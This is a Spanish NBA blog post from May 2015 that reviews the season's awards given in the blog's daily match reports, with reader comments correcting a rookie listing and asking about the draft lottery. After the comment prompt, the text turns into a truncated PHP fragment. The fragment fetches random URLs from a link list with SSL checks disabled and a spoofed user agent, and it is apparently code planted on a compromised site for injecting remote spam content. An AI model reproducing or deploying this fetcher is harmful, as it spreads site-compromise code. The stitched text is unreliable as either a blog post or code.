Los premios de las crónicas

08 de May de 2015 por txusma

No hay cinco sin 6. Sexta temporada consecutiva que nuestro compañero Rompe tiene la paciencia de ir recopilando los premios que vamos otorgando en nuestras crónicas diarias lo que demuestra una fidelidad a prueba de bombas que le agradecemos profundamente. Echémosle un repaso a los datos:

MVP: En los últimos días el blog se ha animado gracias al debate sobre el merecedido MVP de Stephen Curry. Si el galardón se hubiera tenido que decidir según nuestros premios diarios se lo habría llevado James Harden y no con poca diferencia. Tras él aparecen Anthony Davis (para muchos el MVP real si hablamos exclusivamente de aportación individual), el ya clásico Lebron James y el otro monstruo de las estadísticas, Russell Westbrook (10). El jugador de los Warriors se ha tenido que conformar con recibir 8 premios de nuestro MVP. En el capítulo de curiosidades la lista de los MVP más extraños: Omer Asik, Jordan Hill, Evan Fournier, Gerald Henderson… La flauta puede sonar cualquier día. 

Rookie: No somos originales en la primera posición que ha correspondido a Andrew Wiggins, pero sí en el resto. Nikola Mirotic, 2º en el mundo real no aparece hasta la 6ª posición y Nerlens Noels (3º) cae hasta la 10ª. Por delante, Elfrid Payton, Jordan Clarkson (merced a su enorme final de temporada), Jusuf Nurkic y Marcus Smart completan el TOP-5. Pero como siempre pasa con los jóvenes a la mínima que hacen algo ya los destacamos así que por eso gente como Dewayne Dedmon, Dwight PowellJoe Harris también han recibido alguna mención. Premio para el que me diga en qué equipos juegan estos 3 sin buscarlo en google.

Sorpresa: Como siempre el premio más repartido y en la cumbre la sorpresa por antonomasia de esta temporada: Hassan Whiteside. Lo malo para él es que rápido vimos que lo suyo iba en serio y paramos de catalogarlo como sorprendente al 4º partido. De esta manera le han acabado empatando CJ McCollum (ojo con el jugador de los Blazers en el futuro) y Alexey Shved aprovechando el vacío total que reinaba en la plantilla de los Knicks. Cerquita suyo un jugador que parece llamado a cotas más importantes como Khris Middleton y otros veteranos de los que no esperábamos mucho como Devin Harris, Ersan Ilyasova, Omri Casspi o Rasual Butler.

Decepción: Qué pena ver a Derrick Rose en lo alto de esta categoría… Pero lo cierto es que rápido comprobamos que al menos en liga regular aquel Derrick Rose de 2011 no iba a volver a corto plazo. Empatado con él, James Harden (es lo que tiene la excelencia, cualquier día malo destaca) y dos de las decepciones del año: Serge Ibaka y Trey Burke.

Esfuerzo en vano: Se veía venir. Este año el premio “Kevin Love” ha recaído en Demarcus Cousins, cómo no. El mejor Cousins de siempre ha seguido encadenado en esa prisión que son los Sacramento Kings. Esperemos que el año que viene con George Karl al mando remonten y Cousins pueda pelear por objetivos más acordes a su categoría. Tras él, Anthony Davis y Russell Westbrook, los dos titanes que han luchado prácticamente en solitario uno contra el otro para clasificar a sus respectivos equipos a los playoffs.

Comenta

7 comentarios a esta entrada

  1. Triceratops dice:
    #1

    Dewayne Dedmon no es rookie…lo he comentado varias veces. Jugó en los 76ers antes que en los Magic.

      Citar

  2. txusma dice:
    #2

    Pues ahora mismo corregimos. Supongo que nos equivocamos en su momento y al escribir el artículo se me a vuelto a pasar.
    Gracias!

      Citar

  3. Ruxixón dice:
    #3

    Dedmon en Orlando y Joe Harris en Cleveland,los dos seguro.Powell tengo más dudas,porque estuvo seguro involucrado en algún trade,en el de Rondo vaya,,diría que jugó para Dallas y luego salió a Boston pero no me suena que disputara algún minuto con los verdes.¿Dónde está mi premio? 😛

      Citar

  4. Triceratops dice:
    #4

    ¿Cuando es el sorteo de posiciones del Draft? Recuerdo que suele ser a mediados de mayo…

    Txusma…sin exigir, pero..¿hareis mas mocks?

      Citar

  5. Jose Luis dice:
    #5

    19 de mayo 🙂

      Citar

  6. txusma dice:
    #6

    Triceratops:
    ¿Cuando es el sorteo de posiciones del Draft? Recuerdo que suele ser a mediados de mayo…

    Txusma…sin exigir, pero..¿hareis mas mocks?

    Y tanto. Justo después del sorteo sacaremos la versión 2.0

      Citar

  7. Jose Luis dice:
    #7

    txusma: Y tanto. Justo después del sorteo sacaremos la versión 2.0

    ole ole

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>